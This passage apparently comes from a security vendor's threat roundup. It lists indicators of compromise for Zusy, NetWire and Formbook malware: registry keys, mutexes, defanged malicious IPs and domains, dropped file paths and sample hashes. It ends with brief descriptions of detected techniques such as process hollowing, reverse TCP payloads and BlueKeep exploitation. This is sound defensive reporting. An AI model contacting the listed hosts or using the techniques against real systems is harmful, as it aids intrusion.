7643020ec25dbe094756879859317841200a03a38a8d93a37087f56a5dd33aa3
7784649edb79c9df1a6146a6fec957120f214116674a1d553ac19b4d2aed5b03
7d6f641b6eb35eb725e6e2227216682eed4e55e0a60922feda8e56aa956ff380
85777357c58e34405ab912e6b0e581fd6ad3df71a67e8f2bd259d18b5194b2d0
8f9f744d059a4d93df7e1d7c099d8988ff381210c6e7a183640b6a973e854031
9f6fc4498ace519f16984d56585efb57ee818d2ba120e75067df5b12ea6ba9b6

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Zusy-9874915-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER 22
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER
Value Name: id
22
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER
Value Name: 3_tag
18
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER
Value Name: k_tag
18
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER
Value Name: s_t
18
MutexesOccurrences
Global\<random guid> 22
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
104[.]21[.]70[.]96 15
172[.]67[.]222[.]123 13
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
samegresites[.]live 22
73 2
d6 2
21 1
7a 1
62 1
d2 1
25 1
b0 1
07 1
78 1
a9 1
23 1
fe 1
98 1
2b 1
5a 1
ed 1
dd 1
5b 1
b1 1
Files and or directories createdOccurrences
%ProgramFiles(x86)%\MachinerData 22
%System32%\Tasks\Microsoft Windows Defender Update 22

File Hashes

08e2396436175281bece4652077c65ed347317b527dd8959ed49995c506c18ea
0bd537ac02954dfc8b2fce5c846a7d602a05cb797aec103a2fc92e4cf7fe00a1
0bf497b6adb4d970edd2bd5678b2a836be85c51cd1060e9eaf845a1c0f855cc0
33a48a085d971fd1926aa7a12a5243543a55a9457007be3e576193437f60006e
366046a5b332504e4b36f1d6b0fdefe28da60eb3926c34262979beefc0c5dfa6
507aa14adf8a6ab4dca50e362a8228132b74507d4f739cb64aa20c508bb2c059
5ceb9844812fb01e120a7cf7f952a8f19939ac9f9aff1c156aa6d0ea3540df8d
7166a4af75aacb9bc314796151f0f696d36d36deb49c101cfb5a6b1c5d496f23
77d5b020ababe761ddccdf1121ff8b7ed1808405fb2184513c83256fca9714fb
794b65a96034f59ef2007b271ae4408539f797025747d783088143a86689571e
86b571aa152249117725578a2096c3cd9e0a36d9593ad89c493bc78c65875b8b
93f2386c9fe33c0b5e1fb1e2905123c318a2dcb08092b8fdb3317104e1348144
97baf4457b06b9b89395e5b6682c415d37fd22e4ebeb75f4f86cae79037f08df
ba9691b01352cc29482077f21a77f586dafcfbec3fa865028eef6a5c4d01b38b
bc9174ec0a2c05b0d568dd5cae6401ba2c4bddf305b7a7de09907c8d47a73bee
c2a5c08cb67be31d2a508d21374ca2aac1b9d639ff45ebc69a2e27bcde7b81a1
d0f502d9f261351f0a020709c222284ee516d7160e666275fbbf9701cea70ecb
e400dafe7815bd31364c8261a3082f83a8e6f4885d885dfcf8f7e81a729e57ca
eaf7e069b21aab1396749e1123aa97d1f4e9ee18bab2c3b5d27f0ab681ad4e9b
ecd6b72ade892d1ad04438749fe93370a9d7479581dfb17cd450474791b88e0d
f10d8e9b4f99a123e1d219f16f48eedd2395f5c75263334aeb7cb7aee5f9edc0
fa62ee56375bb161655b6e51637146a46d5667923740f5292181b560b7028130

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.NetWire-9875000-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\NETWIRE 23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: officeii365
23
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
23
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
23
MutexesOccurrences
- 23
Global\6e46b6a1-d905-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
155[.]94[.]198[.]169 23
Files and or directories createdOccurrences
\test.exe 23
%APPDATA%\Install 23
%APPDATA%\Install\offiice365.exe 23
\TEMP\test.exe 23

File Hashes

06704ca830646add6402819e68425478c583c49d8d96ead7a45d50c361433ca7
0a669d9cb2cf0ea660d22f7f1e2b5aaac0d077969b558164cf4695fdf475ce9e
0e9c55b8da401f6d4a45a2dcc631fe320248d9dd51ede85105fe17e096498554
0f07928ee421822c2a7486e088fdabb5a610e9a0fd1abf52d70ebd3b5d47f588
12bdc909b4733250b7c9d619376047d2d80d27f643d73396f0a6b9d0a61105a7
1489913e74cef8f0f5d9b4e683ea01d14c1a0a35dcd5ba4b78d0bc42e23490df
348e289a92b9a69058b11ac513e12eeaf4d28563c50ec31f2b4da287cb3418a8
41640478f01da8768dc6753aca9a08e0927d10e74e287c7b904dcc8902d4b410
4c2a544777ec31dcc824b2954ade895403fa735e848bdda9fe7b1e741e25ec79
527368395055ebc2955901cec9324e8a8df365c43c422c703288970a69144a4c
58f5d7676f4e9e84adb063f2d57d46d68739cd72d719c769bf92192029be7eb8
5a9d1dde878cef593cbb4efae80180bddd46c1b78b47e6fc40025cf383bb6a61
6de0daa4590810d06cd29c99a8d7ec46a6990e2c4969c7aea6575cf1fdbf2f65
7abd78feed2a61161bf54f1ab803fd4785690cdf0ba9593c997de755bff54e55
8190cc069296afdbe61c7bae4ae7fd5383a65457118b1f1e6063f37b4dc5749f
8b88bd773ae5d2bceb91555c8ce95222e32c83161c9dba068db456b399fde414
988340569fe93a41eec714307565b666e49d4c6752813a9fc5f5e8ffa82c129f
9fa3239ea4f2ffd42552449b06cb015197fc7acb1b56b4d194ffaddb9a516405
a49cf90bb1d0210d8afc5b0b4b90f251500e127facdb7d860343ea9410b34e22
b19221dfa046ecdc0ea92c553fbecc52b8fd7514a01e931175b39ab10374669c
b375d9191ef5205b538751be74987fe9792f9144be0c042c9d6b2eb0b4717a35
b5ae3918ac589ca1be98dcf8dbc4bfe6b7e129d8ee9161aff1d87952d005b901
c2d30a7085d29f03e493f6800d967179bfe0defbecadfcaae97495bc300e8e05
c4b65520d2d55556bc996d1029f4bf5a8d485864271fb6379b9b94a7eaf46174
c560155a28c80bf8a22ec9f2d4c7d5b6d1d203316068cd261f8822d8a8d7e10d

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Formbook-9875089-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 36 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2 33
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX 33
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX\20.0.1 (EN-US)\MAIN 33
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA THUNDERBIRD 33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: XTD8FTBPKB
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: LPXPD
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: LNUPD
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: YLRX_RP0WZ
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: XZM8FTBP0B
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: YFILPF18FD
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: KTRDUFWHV
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 4H9L_R5H
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: _XVHJH6XCNID
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: NX4DUXPHO6M
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: ZTRDUFW0V
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: K4D0BVQ8FLG
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MRE004N0NP
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: JXK46TRX_TF
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: H480CZWHUB0
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: JREXV4RHNPX
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MND0QFLPOL
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: NND0P6CHAN
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 9R0DOPOHN
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: HXSDZXPXV
1
MutexesOccurrences
nzXUQhCzupjQoqYjPljDVTDb 34
8-3503835SZBFHHZ 33
9PNPN9R7GU4CVCMZ 33
S-1-5-21-2580483-9081142674412 32
S-1-5-21-2580483-8244176756368 5
S-1-5-21-2580483-10324176756368 4
S-1-5-21-2580483-8964176756368 3
S-1-5-21-2580483-20324176756368 3
S-1-5-21-2580483-12924176756368 2
S-1-5-21-2580483-6844176756368 2
S-1-5-21-2580483-14844176756368 2
Global\a506d1a1-d998-11eb-b5f8-00501e3ae7b6 1
S-1-5-21-2580483-12764176756368 1
S-1-5-21-2580483-7804176756368 1
S-1-5-21-2580483-14444176756368 1
S-1-5-21-2580483-16084176756368 1
S-1-5-21-2580483-18724176756368 1
S-1-5-21-2580483-17124176756368 1
S-1-5-21-2580483-16444176756368 1
S-1-5-21-2580483-15564176756368 1
S-1-5-21-2580483-19204176756368 1
S-1-5-21-2580483-19084176756368 1
S-1-5-21-2580483-9244176756368 1
S-1-5-21-2580483-17444176756368 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
217[.]70[.]184[.]50 22
47[.]111[.]101[.]108 22
74[.]208[.]236[.]85 21
162[.]214[.]71[.]171 10
23[.]227[.]38[.]74 7
185[.]230[.]60[.]161 6
52[.]214[.]190[.]156 6
185[.]230[.]60[.]177 5
13[.]59[.]53[.]244 5
34[.]242[.]63[.]192 5
122[.]155[.]17[.]167 5
104[.]237[.]156[.]23 5
185[.]230[.]60[.]102 4
34[.]255[.]61[.]59 4
34[.]243[.]160[.]251 3
149[.]129[.]100[.]52 3
208[.]91[.]197[.]39 2
109[.]68[.]33[.]64 2
185[.]16[.]44[.]132 2
66[.]96[.]147[.]109 2
217[.]19[.]248[.]132 2
34[.]102[.]136[.]180 2
3[.]223[.]115[.]185 2
52[.]14[.]32[.]15 2
34[.]216[.]47[.]14 2

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]mansiobok2[.]info 31
www[.]ebvdcxw[.]com 22
www[.]actu-occitanie[.]com 22
www[.]wxfkyyw[.]com 22
www[.]amigurumibyamanda[.]com 21
www[.]empireremgmt[.]com 20
www[.]xuse[.]info 18
www[.]qualitycarpetcleaningcal[.]com 18
www[.]myshoppingchic[.]com 16
www[.]barkintheparkli[.]com 15
www[.]matthewelliotties[.]com 15
www[.]vabomerewaste[.]info 14
www[.]aldareps[.]com 10
www[.]juxiangjidian[.]com 8
www[.]selectsb[.]com 8
www[.]1e9sevenrainy[.]loan 8
www[.]tntcityinc[.]com 7
www[.]jesusinme[.]net 6
www[.]bikby[.]com 5
www[.]mmssgg[.]com 5
www[.]liveonthehill-festival[.]com 5
www[.]mlyouxian[.]com 5
www[.]theadventurecurators[.]com 5
www[.]tiangongqiaoduo[.]com 5
www[.]keeenterprise[.]com 5

*See JSON for more IOCs

Files and or directories createdOccurrences
\TEMP\test.exe 34
%APPDATA%\9PNPN9R7\9PNlogim.jpeg 34
%APPDATA%\9PNPN9R7\9PNlogri.ini 34
%APPDATA%\9PNPN9R7\9PNlogrv.ini 34
%APPDATA%\9PNPN9R7 33
%APPDATA%\9PNPN9R7\9PNlog.ini 33
%APPDATA%\9PNPN9R7\9PNlogrc.ini 33
\test.exe 24
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\test.exe.log 24
%TEMP%\DB1 17
%APPDATA%\9PNPN9R7\9PNlogrf.ini 17
%APPDATA%\9PNPN9R7\9PNlogrg.ini 17
%ProgramFiles(x86)%\Konu8x 6
%TEMP%\Konu8x 6
%ProgramFiles(x86)%\Ygbcpjfp0 5
%TEMP%\Ygbcpjfp0 5
%ProgramFiles(x86)%\Ygdyljnbp 3
%TEMP%\Ygdyljnbp 3
%ProgramFiles(x86)%\Ygbcpjfp0\useronu8x.exe 3
%TEMP%\Ygbcpjfp0\useronu8x.exe 3
%ProgramFiles(x86)%\Ygbcpjfp0\configonu8x.exe 2
%TEMP%\Ygbcpjfp0\configonu8x.exe 2
%ProgramFiles(x86)%\Ygdyljnbp\user7nihzln0.exe 2
%TEMP%\Ygdyljnbp\user7nihzln0.exe 2
%ProgramFiles(x86)%\Uonu8x\msjjot8.exe 1

*See JSON for more IOCs

File Hashes

00b6af7edaa2b00729733a14bc2bc9c73decdc9af3de09b958585ec309db6730
058a2309d89e8b24502c3a7ba08882eacecafd2e2d419ddecbe91202f80504fe
191db0df191fa868b366cd9b221708bbf46680102decb2fe5bd9838d4edb6db9
1d84d1a99b7add79357e2b8470f97473ff2b7630853266a46f86b360dc23eb58
2f3ed7f2aa896961026bad2904d961dd8c45f30264a6ffdf9635aecdcfb3557b
351ff4900300a3012cf567aadc1e025e27b385cd677ea9152517bdd271447326
35ef714239b96dac502edee1da7c546039a67dfd31ff8751927cd4b9c86b83a7
439341e4b6ef8081dace5531a98a018c31ba3b83a8b58c248db3f9aaa6248e79
4b9450d76929aabf8390ad818fd3d40a735d76d679b0f4cfb58ff60ced2ee6fd
4ea09532da8004377ffcdc400fc8e96c90a836cc83caa394a62bfd865c8e7425
6111eeaab08838bc32e1f0ade3b5af96955c29d459a3702090369598a5a1d067
61e1b56481c68ffcd7be4b30ec427401c7385af1a64451e221a17eb70b4d5819
66ce3bdcd391f238136f7b126f88bcbd6cebbebab1187083c4305bbb09ecfd55
6d009d7e9c6efaf020a6336b3da9022ba552782794e36c112b67142a64394524
70ae91fc903cf888459854bafc02aba096412e7d264a09720f9447d3d7bbf17c
73e2f69e19e575c987a9004886e42129fc259758f19a48badaa52fcb7f9925cb
791bf882ea8aa1b2087f0882c7012170002fca93de56f191cbba27b2817a5007
7f98741e8dbf35c91d3a06b890343c392f90f43ada2765b9ebf5918581e35385
85e2ee6d0a2fb9833421a85012326f028f291172b55ec3d0ce7c93464f238d58
87de264b55264f6d4106bf216e61b5fb36110db7ecb66b3f5e3e4bc51c092779
9e424316353fbc89681166a6ef69b2edd31739ae5d8d72a9ab7f516ce50c9b3c
9f086d1b80984ca1a1026f47f5d9a84dccf7a0b758bf46643a2d967f24ebaefb
a0f0cf9630816feae91a78847e7c2c95581e150d4d1c7804c9a88eef1d0393a5
a7ad003a9a0d32f74833166178765af17cb09672095f96ad717b40983b2d4e49
ae995cf72a73ec57b55570024ef709b89a25aa5df8a64091b6e783e991af1c70

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (10295)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Reverse tcp payload detected - (4276)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
Excessively long PowerShell command detected - (4020)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Crystalbit-Apple DLL double hijack detected - (2014)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
A Microsoft Office process has started a windows utility. - (736)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Squiblydoo application control bypass attempt detected. - (699)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Kovter injection detected - (536)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Dealply adware detected - (126)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Trickbot malware detected - (122)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
CVE-2019-0708 detected - (117)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.